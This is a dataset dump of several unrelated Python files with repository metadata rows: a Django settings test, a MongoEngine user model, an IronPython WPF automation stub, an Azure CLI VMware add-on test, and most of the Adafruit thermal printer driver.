self.settings_module.SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
req = HttpRequest()
req.META['HTTP_X_FORWARDED_PROTOCOL'] = 'https'
self.assertEqual(req.is_secure(), True)
class IsOverriddenTest(TestCase):
def test_configure(self):
s = LazySettings()
s.configure(SECRET_KEY='foo')
self.assertTrue(s.is_overridden('SECRET_KEY'))
def test_module(self):
settings_module = ModuleType('fake_settings_module')
settings_module.SECRET_KEY = 'foo'
sys.modules['fake_settings_module'] = settings_module
try:
s = Settings('fake_settings_module')
self.assertTrue(s.is_overridden('SECRET_KEY'))
self.assertFalse(s.is_overridden('TEMPLATE_LOADERS'))
finally:
del sys.modules['fake_settings_module']
def test_override(self):
self.assertFalse(settings.is_overridden('TEMPLATE_LOADERS'))
with override_settings(TEMPLATE_LOADERS=[]):
self.assertTrue(settings.is_overridden('TEMPLATE_LOADERS'))
| 35.965831 | 93 | 0.661473 |
e8afd8060469457f8ee21f258f41574a80143df4 | 882 | py | Python | Server/app/models/user.py | JoMingyu/BookCheck-Backend | fbe71a39e385a3c739e7e40ab1153efbe7835576 | [
"MIT"
] | 1 | 2018-04-12T10:51:49.000Z | 2018-04-12T10:51:49.000Z | Server/app/models/user.py | JoMingyu/BookCheck-Backend | fbe71a39e385a3c739e7e40ab1153efbe7835576 | [
"MIT"
] | null | null | null | Server/app/models/user.py | JoMingyu/BookCheck-Backend | fbe71a39e385a3c739e7e40ab1153efbe7835576 | [
"MIT"
] | null | null | null | from datetime import datetime
from app.models import *
from app.models.library import LibraryModel
class UserBase(Document):
"""
User Base Collection
"""
signup_time = DateTimeField(required=True, default=datetime.now())
id = StringField(primary_key=True)
pw = StringField(required=True)
meta = {'allow_inheritance': True}
class UserModel(UserBase):
"""
Common User
"""
belonging_libraries = ListField(ReferenceField(LibraryModel, required=True))
# 사용자가 속한 도서관들
class AdminModel(UserBase):
"""
Admin
"""
managing_library = ReferenceField(LibraryModel, required=True)
# 관리하고 있는 도서관
class RefreshTokenModel(Document):
"""
Manages Refresh Token
"""
refresh_token = UUIDField(primary_key=True)
owner = ReferenceField(UserBase, required=True)
pw_snapshot = StringField(required=True)
| 21 | 80 | 0.693878 |
846e3fc3528b348df206e8876c674361614747cb | 14,716 | py | Python | stubs.min/System/Windows/Automation/Peers_parts/CalendarAutomationPeer.py | ricardyn/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2021-02-02T13:39:16.000Z | 2021-02-02T13:39:16.000Z | stubs.min/System/Windows/Automation/Peers_parts/CalendarAutomationPeer.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/System/Windows/Automation/Peers_parts/CalendarAutomationPeer.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class CalendarAutomationPeer(FrameworkElementAutomationPeer,IGridProvider,IMultipleViewProvider,ISelectionProvider,ITableProvider,IItemContainerProvider):
"""
Exposes System.Windows.Controls.Calendar types to UI Automation.
CalendarAutomationPeer(owner: Calendar)
"""
def GetAcceleratorKeyCore(self,*args):
"""
GetAcceleratorKeyCore(self: UIElementAutomationPeer) -> str
Gets the accelerator key for the System.Windows.UIElement that is associated
with this System.Windows.Automation.Peers.UIElementAutomationPeer. This method
is called by System.Windows.Automation.Peers.AutomationPeer.GetAcceleratorKey.
Returns: The System.Windows.Automation.AutomationProperties.AcceleratorKey that is
returned by
System.Windows.Automation.AutomationProperties.GetAcceleratorKey(System.Windows.
DependencyObject).
"""
pass
def GetAccessKeyCore(self,*args):
"""
GetAccessKeyCore(self: UIElementAutomationPeer) -> str
Gets the access key for the System.Windows.UIElement that is associated with
this System.Windows.Automation.Peers.UIElementAutomationPeer.This method is
called by System.Windows.Automation.Peers.AutomationPeer.GetAccessKey.
Returns: The access key for the System.Windows.UIElement that is associated with this
System.Windows.Automation.Peers.UIElementAutomationPeer.
"""
pass
def GetAutomationControlTypeCore(self,*args):
""" GetAutomationControlTypeCore(self: CalendarAutomationPeer) -> AutomationControlType """
pass
def GetAutomationIdCore(self,*args):
"""
GetAutomationIdCore(self: FrameworkElementAutomationPeer) -> str
Gets the string that uniquely identifies the System.Windows.FrameworkElement
that is associated with this
System.Windows.Automation.Peers.FrameworkElementAutomationPeer. Called by
System.Windows.Automation.Peers.AutomationPeer.GetAutomationId.
Returns: The automation identifier for the element associated with the
System.Windows.Automation.Peers.FrameworkElementAutomationPeer,or
System.String.Empty if there isn't an automation identifier.
"""
pass
def GetBoundingRectangleCore(self,*args):
"""
GetBoundingRectangleCore(self: UIElementAutomationPeer) -> Rect
Gets the System.Windows.Rect that represents the bounding rectangle of the
System.Windows.UIElement that is associated with this
System.Windows.Automation.Peers.UIElementAutomationPeer. This method is called
by System.Windows.Automation.Peers.AutomationPeer.GetBoundingRectangle.
Returns: The System.Windows.Rect that contains the coordinates of the element.
Optionally,if the element is not both a System.Windows.Interop.HwndSource and
a System.Windows.PresentationSource,this method returns
System.Windows.Rect.Empty.
"""
pass
def GetChildrenCore(self,*args):
""" GetChildrenCore(self: CalendarAutomationPeer) -> List[AutomationPeer] """
pass
def GetClassNameCore(self,*args):
""" GetClassNameCore(self: CalendarAutomationPeer) -> str """
pass
def GetClickablePointCore(self,*args):
"""
GetClickablePointCore(self: UIElementAutomationPeer) -> Point
Gets a System.Windows.Point that represents the clickable space that is on the
System.Windows.UIElement that is associated with this
System.Windows.Automation.Peers.UIElementAutomationPeer. This method is called
by System.Windows.Automation.Peers.AutomationPeer.GetClickablePoint.
Returns: The System.Windows.Point on the element that allows a click. The point values
are (System.Double.NaN,System.Double.NaN) if the element is not both a
System.Windows.Interop.HwndSource and a System.Windows.PresentationSource.
"""
pass
def GetHelpTextCore(self,*args):
"""
GetHelpTextCore(self: FrameworkElementAutomationPeer) -> str
Gets the string that describes the functionality of the
System.Windows.ContentElement that is associated with this
System.Windows.Automation.Peers.ContentElementAutomationPeer. Called by
System.Windows.Automation.Peers.AutomationPeer.GetHelpText.
Returns: The help text,usually from the System.Windows.Controls.ToolTip,or
System.String.Empty if there is no help text.
"""
pass
def GetHostRawElementProviderCore(self,*args):
"""
GetHostRawElementProviderCore(self: AutomationPeer) -> HostedWindowWrapper
Tells UI Automation where in the UI Automation tree to place the hwnd being
hosted by a Windows Presentation Foundation (WPF) element.
Returns: This method returns the hosted hwnd to UI Automation for controls that host
hwnd objects.
"""
pass
def GetItemStatusCore(self,*args):
"""
GetItemStatusCore(self: UIElementAutomationPeer) -> str
Gets a string that communicates the visual status of the
System.Windows.UIElement that is associated with this
System.Windows.Automation.Peers.UIElementAutomationPeer. This method is called
by System.Windows.Automation.Peers.AutomationPeer.GetItemStatus.
Returns: The string that contains the
System.Windows.Automation.AutomationProperties.ItemStatus that is returned by
System.Windows.Automation.AutomationProperties.GetItemStatus(System.Windows.Depe
ndencyObject).
"""
pass
def GetItemTypeCore(self,*args):
"""
GetItemTypeCore(self: UIElementAutomationPeer) -> str
Gets a human-readable string that contains the item type that the
System.Windows.UIElement for this
System.Windows.Automation.Peers.UIElementAutomationPeer represents. This method
is called by System.Windows.Automation.Peers.AutomationPeer.GetItemType.
Returns: The string that contains the
System.Windows.Automation.AutomationProperties.ItemType that is returned by
System.Windows.Automation.AutomationProperties.GetItemType(System.Windows.Depend
encyObject).
"""
pass
def GetLabeledByCore(self,*args):
"""
GetLabeledByCore(self: UIElementAutomationPeer) -> AutomationPeer
Gets the System.Windows.Automation.Peers.AutomationPeer for the element that is
targeted to the System.Windows.UIElement for this
System.Windows.Automation.Peers.UIElementAutomationPeer. This method is called
by System.Windows.Automation.Peers.AutomationPeer.GetLabeledBy.
Returns: The System.Windows.Automation.Peers.AutomationPeer for the element that is
targeted to the System.Windows.UIElement for this
System.Windows.Automation.Peers.UIElementAutomationPeer.
"""
pass
def GetLocalizedControlTypeCore(self,*args):
"""
GetLocalizedControlTypeCore(self: AutomationPeer) -> str
When overridden in a derived class,is called by
System.Windows.Automation.Peers.AutomationPeer.GetLocalizedControlType.
Returns: The type of the control.
"""
pass
def GetNameCore(self,*args):
"""
GetNameCore(self: FrameworkElementAutomationPeer) -> str
Gets the text label of the System.Windows.ContentElement that is associated
with this System.Windows.Automation.Peers.ContentElementAutomationPeer. Called
by System.Windows.Automation.Peers.AutomationPeer.GetName.
Returns: The text label of the element that is associated with this automation peer.
"""
pass
def GetOrientationCore(self,*args):
"""
GetOrientationCore(self: UIElementAutomationPeer) -> AutomationOrientation
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer is
laid out in a specific direction. This method is called by
System.Windows.Automation.Peers.AutomationPeer.GetOrientation.
Returns: The System.Windows.Automation.Peers.AutomationOrientation.None enumeration
value.
"""
pass
def GetPattern(self,patternInterface):
"""
GetPattern(self: CalendarAutomationPeer,patternInterface: PatternInterface) -> object
Gets the object that supports the specified control pattern of the element that
is associated with this automation peer.
patternInterface: An enumeration value that specifies the control pattern.
Returns: If patternInterface is System.Windows.Automation.Peers.PatternInterface.Grid,
System.Windows.Automation.Peers.PatternInterface.Table,
System.Windows.Automation.Peers.PatternInterface.MultipleView,or
System.Windows.Automation.Peers.PatternInterface.Selection,this method returns
a this pointer; otherwise,this method returns null.
"""
pass
def GetPeerFromPointCore(self,*args):
""" GetPeerFromPointCore(self: AutomationPeer,point: Point) -> AutomationPeer """
pass
def HasKeyboardFocusCore(self,*args):
"""
HasKeyboardFocusCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer
currently has keyboard input focus. This method is called by
System.Windows.Automation.Peers.AutomationPeer.HasKeyboardFocus.
Returns: true if the element has keyboard input focus; otherwise,false.
"""
pass
def IsContentElementCore(self,*args):
"""
IsContentElementCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer is
an element that contains data that is presented to the user. This method is
called by System.Windows.Automation.Peers.AutomationPeer.IsContentElement.
Returns: true.
"""
pass
def IsControlElementCore(self,*args):
"""
IsControlElementCore(self: UIElementAutomationPeer) -> bool
Gets or sets a value that indicates whether the System.Windows.UIElement that
is associated with this System.Windows.Automation.Peers.UIElementAutomationPeer
is understood by the end user as interactive. Optionally,the user might
understand the System.Windows.UIElement as contributing to the logical
structure of the control in the GUI. This method is called by
System.Windows.Automation.Peers.AutomationPeer.IsControlElement.
Returns: true.
"""
pass
def IsEnabledCore(self,*args):
"""
IsEnabledCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer
can accept keyboard focus. This method is called by
System.Windows.Automation.Peers.AutomationPeer.IsKeyboardFocusable.
Returns: A boolean that contains the value of System.Windows.UIElement.IsEnabled.
"""
pass
def IsKeyboardFocusableCore(self,*args):
"""
IsKeyboardFocusableCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer
can accept keyboard focus. This method is called by
System.Windows.Automation.Peers.AutomationPeer.IsKeyboardFocusable.
Returns: true if the element is focusable by the keyboard; otherwise false.
"""
pass
def IsOffscreenCore(self,*args):
"""
IsOffscreenCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer is
off the screen. This method is called by
System.Windows.Automation.Peers.AutomationPeer.IsOffscreen.
Returns: true if the element is not on the screen; otherwise,false.
"""
pass
def IsPasswordCore(self,*args):
"""
IsPasswordCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer
contains protected content. This method is called by
System.Windows.Automation.Peers.AutomationPeer.IsPassword.
Returns: false.
"""
pass
def IsRequiredForFormCore(self,*args):
"""
IsRequiredForFormCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer is
required to be completed on a form. This method is called by
System.Windows.Automation.Peers.AutomationPeer.IsRequiredForForm.
Returns: A boolean that contains the value that is returned by
System.Windows.Automation.AutomationProperties.GetIsRequiredForForm(System.Windo
ws.DependencyObject),if it's set; otherwise false.
"""
pass
def PeerFromProvider(self,*args):
"""
PeerFromProvider(self: AutomationPeer,provider: IRawElementProviderSimple) -> AutomationPeer
Gets an System.Windows.Automation.Peers.AutomationPeer for the specified
System.Windows.Automation.Provider.IRawElementProviderSimple proxy.
provider: The class that implements
System.Windows.Automation.Provider.IRawElementProviderSimple.
Returns: The System.Windows.Automation.Peers.AutomationPeer.
"""
pass
def ProviderFromPeer(self,*args):
"""
ProviderFromPeer(self: AutomationPeer,peer: AutomationPeer) -> IRawElementProviderSimple
Gets the System.Windows.Automation.Provider.IRawElementProviderSimple for the
specified System.Windows.Automation.Peers.AutomationPeer.
peer: The automation peer.
Returns: The proxy.
"""
pass
def SetFocusCore(self,*args):
""" SetFocusCore(self: CalendarAutomationPeer) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self,owner):
""" __new__(cls: type,owner: Calendar) """
pass
IsHwndHost=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that indicates whether the element that is associated with this System.Windows.Automation.Peers.AutomationPeer hosts hwnds in Windows Presentation Foundation (WPF).
"""
| 42.287356 | 215 | 0.743205 |
cfda2e68734390c50ae3ba18e63b86fbfdfb6d28 | 2,864 | py | Python | src/vmware/azext_vmware/tests/latest/test_addon_scenario.py | santosh02iiit/azure-cli-extensions | 24247cfa19e2a5894937f19e17fbdc8308b28ef6 | [
"MIT"
] | 1 | 2021-12-17T01:27:06.000Z | 2021-12-17T01:27:06.000Z | src/vmware/azext_vmware/tests/latest/test_addon_scenario.py | santosh02iiit/azure-cli-extensions | 24247cfa19e2a5894937f19e17fbdc8308b28ef6 | [
"MIT"
] | 5 | 2022-03-08T17:46:24.000Z | 2022-03-23T18:27:45.000Z | src/vmware/azext_vmware/tests/latest/test_addon_scenario.py | santosh02iiit/azure-cli-extensions | 24247cfa19e2a5894937f19e17fbdc8308b28ef6 | [
"MIT"
] | 2 | 2021-09-22T08:25:32.000Z | 2021-09-24T06:55:31.000Z | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import unittest
from azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer)
from msrestazure.azure_exceptions import CloudError
class VmwareAddonScenarioTest(ScenarioTest):
def setUp(self):
# https://vcrpy.readthedocs.io/en/latest/configuration.html#request-matching
self.vcr.match_on = ['scheme', 'method', 'path', 'query'] # not 'host', 'port'
super(VmwareAddonScenarioTest, self).setUp()
@ResourceGroupPreparer(name_prefix='cli_test_vmware_addon')
def test_vmware_addon(self):
self.kwargs.update({
'loc': 'northcentralus',
'privatecloud': 'mycloud1'
})
# create a private cloud
self.cmd('vmware private-cloud create -g {rg} -n {privatecloud} --location {loc} --sku av20 --cluster-size 4 --network-block 192.168.48.0/22 --accept-eula')
# List all existing addon
count = len(self.cmd('vmware addon list -g {rg} -c {privatecloud}').get_output_in_json())
self.assertEqual(count, 0, 'addon count expected to be 0')
# Create a VR addon
self.cmd('az vmware addon vr create -g {rg} -c {privatecloud} --vrs-count 1')
# List all existing addon
count = len(self.cmd('vmware addon list -g {rg} -c {privatecloud}').get_output_in_json())
self.assertEqual(count, 1, 'addon count expected to be 1')
# Show a VR addon
self.cmd('az vmware addon vr show -g {rg} -c {privatecloud}')
# Delete a VR addon
self.cmd('az vmware addon vr delete -g {rg} -c {privatecloud}')
# List all existing addon
count = len(self.cmd('vmware addon list -g {rg} -c {privatecloud}').get_output_in_json())
self.assertEqual(count, 0, 'addon count expected to be 0')
# Create a SRM addon
self.cmd('az vmware addon srm create -g {rg} -c {privatecloud} --license-key "41915-178A8-FF4A4-DB683-6D735"')
# List all existing addon
count = len(self.cmd('vmware addon list -g {rg} -c {privatecloud}').get_output_in_json())
self.assertEqual(count, 1, 'addon count expected to be 1')
# Show a SRM addon
self.cmd('az vmware addon srm show -g {rg} -c {privatecloud}')
# Delete a SRM addon
self.cmd('az vmware addon srm delete -g {rg} -c {privatecloud}')
# List all existing addon
count = len(self.cmd('vmware addon list -g {rg} -c {privatecloud}').get_output_in_json())
self.assertEqual(count, 0, 'addon count expected to be 0')
| 43.393939 | 164 | 0.606844 |
f97d700e522dc495c36024ea6faca696c7b936e1 | 16,553 | py | Python | python/Adafruit_Thermal.py | 8power8/yvetteomatic | cc323317c3fd5c160fe432c46cce629a3e648a5b | [
"WTFPL"
] | null | null | null | python/Adafruit_Thermal.py | 8power8/yvetteomatic | cc323317c3fd5c160fe432c46cce629a3e648a5b | [
"WTFPL"
] | null | null | null | python/Adafruit_Thermal.py | 8power8/yvetteomatic | cc323317c3fd5c160fe432c46cce629a3e648a5b | [
"WTFPL"
] | null | null | null | #*************************************************************************
# This is a Python library for the Adafruit Thermal Printer.
# Pick one up at --> http://www.adafruit.com/products/597
# These printers use TTL serial to communicate, 2 pins are required.
# IMPORTANT: On 3.3V systems (e.g. Raspberry Pi), use a 10K resistor on
# the RX pin (TX on the printer, green wire), or simply leave unconnected.
#
# Adafruit invests time and resources providing this open source code.
# Please support Adafruit and open-source hardware by purchasing products
# from Adafruit!
#
# Written by Limor Fried/Ladyada for Adafruit Industries.
# Python port by Phil Burgess for Adafruit Industries.
# MIT license, all text above must be included in any redistribution.
#*************************************************************************
# This is pretty much a 1:1 direct Python port of the Adafruit_Thermal
# library for Arduino. All methods use the same naming conventions as the
# Arduino library, with only slight changes in parameter behavior where
# needed. This should simplify porting existing Adafruit_Thermal-based
# printer projects to Raspberry Pi, BeagleBone, etc. See printertest.py
# for an example.
#
# One significant change is the addition of the printImage() function,
# which ties this to the Python Imaging Library and opens the door to a
# lot of cool graphical stuff!
#
# TO DO:
# - Might use standard ConfigParser library to put thermal calibration
# settings in a global configuration file (rather than in the library).
# - Make this use proper Python library installation procedure.
# - Trap errors properly. Some stuff just falls through right now.
# - Add docstrings throughout!
# Python 2.X code using the library usu. needs to include the next line:
from __future__ import print_function
from serial import Serial
import time
class Adafruit_Thermal(Serial):
resumeTime = 0.0
byteTime = 0.0
dotPrintTime = 0.033
dotFeedTime = 0.0025
prevByte = '\n'
column = 0
maxColumn = 32
charHeight = 24
lineSpacing = 8
barcodeHeight = 50
printMode = 0
defaultHeatTime = 150
def __init__(self, *args, **kwargs):
# If no parameters given, use default port & baud rate.
# If only port is passed, use default baud rate.
# If both passed, use those values.
baudrate = 19200
if len(args) == 0:
args = [ "/dev/ttyAMA0", baudrate ]
elif len(args) == 1:
args = [ args[0], baudrate ]
else:
baudrate = args[1]
# Calculate time to issue one byte to the printer.
# 11 bits (not 8) to accommodate idle, start and stop bits.
# Idle time might be unnecessary, but erring on side of
# caution here.
self.byteTime = 11.0 / float(baudrate)
Serial.__init__(self, *args, **kwargs)
# Remainder of this method was previously in begin()
# The printer can't start receiving data immediately upon
# power up -- it needs a moment to cold boot and initialize.
# Allow at least 1/2 sec of uptime before printer can
# receive data.
self.timeoutSet(0.5)
self.wake()
self.reset()
# Description of print settings from page 23 of the manual:
# ESC 7 n1 n2 n3 Setting Control Parameter Command
# Decimal: 27 55 n1 n2 n3
# Set "max heating dots", "heating time", "heating interval"
# n1 = 0-255 Max heat dots, Unit (8dots), Default: 7 (64 dots)
# n2 = 3-255 Heating time, Unit (10us), Default: 80 (800us)
# n3 = 0-255 Heating interval, Unit (10us), Default: 2 (20us)
# The more max heating dots, the more peak current will cost
# when printing, the faster printing speed. The max heating
# dots is 8*(n1+1). The more heating time, the more density,
# but the slower printing speed. If heating time is too short,
# blank page may occur. The more heating interval, the more
# clear, but the slower printing speed.
heatTime = kwargs.get('heattime', self.defaultHeatTime)
self.writeBytes(
27, # Esc
55, # 7 (print settings)
20, # Heat dots (20 = balance darkness w/no jams)
heatTime, # Lib default = 45
250) # Heat interval (500 uS = slower but darker)
# Description of print density from page 23 of the manual:
# DC2 # n Set printing density
# Decimal: 18 35 n
# D4..D0 of n is used to set the printing density.
# Density is 50% + 5% * n(D4-D0) printing density.
# D7..D5 of n is used to set the printing break time.
# Break time is n(D7-D5)*250us.
# (Unsure of the default value for either -- not documented)
printDensity = 18 # 120% (can go higher, but text gets fuzzy)
printBreakTime = 4 # 500 uS
self.writeBytes(
18, # DC2
35, # Print density
(printBreakTime << 5) | printDensity)
self.dotPrintTime = 0.03
self.dotFeedTime = 0.0021
# Because there's no flow control between the printer and computer,
# special care must be taken to avoid overrunning the printer's
# buffer. Serial output is throttled based on serial speed as well
# as an estimate of the device's print and feed rates (relatively
# slow, being bound to moving parts and physical reality). After
# an operation is issued to the printer (e.g. bitmap print), a
# timeout is set before which any other printer operations will be
# suspended. This is generally more efficient than using a delay
# in that it allows the calling code to continue with other duties
# (e.g. receiving or decoding an image) while the printer
# physically completes the task.
# Sets estimated completion time for a just-issued task.
def timeoutSet(self, x):
self.resumeTime = time.time() + x
# Waits (if necessary) for the prior task to complete.
def timeoutWait(self):
while (time.time() - self.resumeTime) < 0: pass
# Printer performance may vary based on the power supply voltage,
# thickness of paper, phase of the moon and other seemingly random
# variables. This method sets the times (in microseconds) for the
# paper to advance one vertical 'dot' when printing and feeding.
# For example, in the default initialized state, normal-sized text
# is 24 dots tall and the line spacing is 32 dots, so the time for
# one line to be issued is approximately 24 * print time + 8 * feed
# time. The default print and feed times are based on a random
# test unit, but as stated above your reality may be influenced by
# many factors. This lets you tweak the timing to avoid excessive
# delays and/or overrunning the printer buffer.
def setTimes(self, p, f):
# Units are in microseconds for
# compatibility with Arduino library
self.dotPrintTime = p / 1000000.0
self.dotFeedTime = f / 1000000.0
# 'Raw' byte-writing method
def writeBytes(self, *args):
self.timeoutWait()
self.timeoutSet(len(args) * self.byteTime)
for arg in args:
super(Adafruit_Thermal, self).write(chr(arg))
# Override write() method to keep track of paper feed.
def write(self, *data):
for i in range(len(data)):
c = data[i]
if c != 0x13:
self.timeoutWait()
super(Adafruit_Thermal, self).write(c)
d = self.byteTime
if ((c == '\n') or
(self.column == self.maxColumn)):
# Newline or wrap
if self.prevByte == '\n':
# Feed line (blank)
d += ((self.charHeight +
self.lineSpacing) *
self.dotFeedTime)
else:
# Text line
d += ((self.charHeight *
self.dotPrintTime) +
(self.lineSpacing *
self.dotFeedTime))
self.column = 0
# Treat wrap as newline
# on next pass
c = '\n'
else:
self.column += 1
self.timeoutSet(d)
self.prevByte = c
# The bulk of this method was moved into __init__,
# but this is left here for compatibility with older
# code that might get ported directly from Arduino.
def begin(self, heatTime=defaultHeatTime):
self.writeBytes(
27, # Esc
55, # 7 (print settings)
20, # Heat dots (20 = balance darkness w/no jams)
heatTime, # Lib default = 45
250) # Heat interval (500 uS = slower but darker)
def reset(self):
self.prevByte = '\n' # Treat as if prior line is blank
self.column = 0
self.maxColumn = 32
self.charHeight = 24
self.lineSpacing = 8
self.barcodeHeight = 50
self.writeBytes(27, 64)
# Reset text formatting parameters.
def setDefault(self):
self.online()
self.justify('L')
self.inverseOff()
self.doubleHeightOff()
self.setLineHeight(32)
self.boldOff()
self.underlineOff()
self.setBarcodeHeight(50)
self.setSize('s')
def test(self):
self.writeBytes(18, 84)
self.timeoutSet(
self.dotPrintTime * 24 * 26 +
self.dotFeedTime * (8 * 26 + 32))
UPC_A = 0
UPC_E = 1
EAN13 = 2
EAN8 = 3
CODE39 = 4
I25 = 5
CODEBAR = 6
CODE93 = 7
CODE128 = 8
CODE11 = 9
MSI = 10
def printBarcode(self, text, type):
self.writeBytes(
29, 72, 2, # Print label below barcode
29, 119, 3, # Barcode width
29, 107, type) # Barcode type
# Print string
self.timeoutWait()
self.timeoutSet((self.barcodeHeight + 40) * self.dotPrintTime)
super(Adafruit_Thermal, self).write(text)
self.prevByte = '\n'
self.feed(2)
def setBarcodeHeight(self, val=50):
if val < 1:
val = 1
self.barcodeHeight = val
self.writeBytes(29, 104, val)
# === Character commands ===
INVERSE_MASK = (1 << 1)
UPDOWN_MASK = (1 << 2)
BOLD_MASK = (1 << 3)
DOUBLE_HEIGHT_MASK = (1 << 4)
DOUBLE_WIDTH_MASK = (1 << 5)
STRIKE_MASK = (1 << 6)
def setPrintMode(self, mask):
self.printMode |= mask
self.writePrintMode()
if self.printMode & self.DOUBLE_HEIGHT_MASK:
self.charHeight = 48
else:
self.charHeight = 24
if self.printMode & self.DOUBLE_WIDTH_MASK:
self.maxColumn = 16
else:
self.maxColumn = 32
def unsetPrintMode(self, mask):
self.printMode &= ~mask
self.writePrintMode()
if self.printMode & self.DOUBLE_HEIGHT_MASK:
self.charHeight = 48
else:
self.charHeight = 24
if self.printMode & self.DOUBLE_WIDTH_MASK:
self.maxColumn = 16
else:
self.maxColumn = 32
def writePrintMode(self):
self.writeBytes(27, 33, self.printMode)
def normal(self):
self.printMode = 0
self.writePrintMode()
def inverseOn(self):
self.setPrintMode(self.INVERSE_MASK)
def inverseOff(self):
self.unsetPrintMode(self.INVERSE_MASK)
def upsideDownOn(self):
self.setPrintMode(self.UPDOWN_MASK)
def upsideDownOff(self):
self.unsetPrintMode(self.UPDOWN_MASK)
def doubleHeightOn(self):
self.setPrintMode(self.DOUBLE_HEIGHT_MASK)
def doubleHeightOff(self):
self.unsetPrintMode(self.DOUBLE_HEIGHT_MASK)
def doubleWidthOn(self):
self.setPrintMode(self.DOUBLE_WIDTH_MASK)
def doubleWidthOff(self):
self.unsetPrintMode(self.DOUBLE_WIDTH_MASK)
def strikeOn(self):
self.setPrintMode(self.STRIKE_MASK)
def strikeOff(self):
self.unsetPrintMode(self.STRIKE_MASK)
def boldOn(self):
self.setPrintMode(self.BOLD_MASK)
def boldOff(self):
self.unsetPrintMode(self.BOLD_MASK)
def justify(self, value):
c = value.upper()
if c == 'C':
pos = 1
elif c == 'R':
pos = 2
else:
pos = 0
self.writeBytes(0x1B, 0x61, pos)
# Feeds by the specified number of lines
def feed(self, x=1):
# The datasheet claims sending bytes 27, 100, <x> will work,
# but it feeds much more than that. So it's done manually:
while x > 0:
self.write('\n')
x -= 1
# Feeds by the specified number of individual pixel rows
def feedRows(self, rows):
self.writeBytes(27, 74, rows)
self.timeoutSet(rows * dotFeedTime)
def flush(self):
self.writeBytes(12)
def setSize(self, value):
c = value.upper()
if c == 'L': # Large: double width and height
size = 0x11
self.charHeight = 48
self.maxColumn = 16
elif c == 'M': # Medium: double height
size = 0x01
self.charHeight = 48
self.maxColumn = 32
else: # Small: standard width and height
size = 0x00
self.charHeight = 24
self.maxColumn = 32
self.writeBytes(29, 33, size, 10)
prevByte = '\n' # Setting the size adds a linefeed
# Underlines of different weights can be produced:
# 0 - no underline
# 1 - normal underline
# 2 - thick underline
def underlineOn(self, weight=1):
self.writeBytes(27, 45, weight)
def underlineOff(self):
self.underlineOn(0)
def printBitmap(self, w, h, bitmap, LaaT=False):
rowBytes = (w + 7) / 8 # Round up to next byte boundary
if rowBytes >= 48:
rowBytesClipped = 48 # 384 pixels max width
else:
rowBytesClipped = rowBytes
# if LaaT (line-at-a-time) is True, print bitmaps
# scanline-at-a-time (rather than in chunks).
# This tends to make for much cleaner printing
# (no feed gaps) on large images...but has the
# opposite effect on small images that would fit
# in a single 'chunk', so use carefully!
if LaaT: maxChunkHeight = 1
else: maxChunkHeight = 255
i = 0
for rowStart in range(0, h, maxChunkHeight):
chunkHeight = h - rowStart
if chunkHeight > maxChunkHeight:
chunkHeight = maxChunkHeight
# Timeout wait happens here
self.writeBytes(18, 42, chunkHeight, rowBytesClipped)
for y in range(chunkHeight):
for x in range(rowBytesClipped):
super(Adafruit_Thermal, self).write(
chr(bitmap[i]))
i += 1
i += rowBytes - rowBytesClipped
self.timeoutSet(chunkHeight * self.dotPrintTime)
self.prevByte = '\n'
# Print Image. Requires Python Imaging Library. This is
# specific to the Python port and not present in the Arduino
# library. Image will be cropped to 384 pixels width if
# necessary, and converted to 1-bit w/diffusion dithering.
# For any other behavior (scale, B&W threshold, etc.), use
# the Imaging Library to perform such operations before
# passing the result to this function.
def printImage(self, image, LaaT=False):
import Image
if image.mode != '1':
image = image.convert('1')
width = image.size[0]
height = image.size[1]
if width > 384:
width = 384
rowBytes = (width + 7) / 8
bitmap = bytearray(rowBytes * height)
pixels = image.load()
for y in range(height):
n = y * rowBytes
x = 0
for b in range(rowBytes):
sum = 0
bit = 128
while bit > 0:
if x >= width: break
if pixels[x, y] == 0:
sum |= bit
x += 1
bit >>= 1
bitmap[n + b] = sum
self.printBitmap(width, height, bitmap, LaaT)
# Take the printer offline. Print commands sent after this
# will be ignored until 'online' is called.
def offline(self):
self.writeBytes(27, 61, 0)
# Take the printer online. Subsequent print commands will be obeyed.
def online(self):
self.writeBytes(27, 61, 1)
# Put the printer into a low-energy state immediately.
def sleep(self):
self.sleepAfter(1)
# Put the printer into a low-energy state after
# the given number of seconds.
def sleepAfter(self, seconds):
self.writeBytes(27, 56, seconds)
def wake(self):
self.timeoutSet(0);
self.writeBytes(255)
for i in range(10):
self.writeBytes(27)
self.timeoutSet(0.1)
# Empty method, included for compatibility
# with existing code ported from Arduino.
def listen(self):
pass
# Check the status of the paper using the printers self reporting
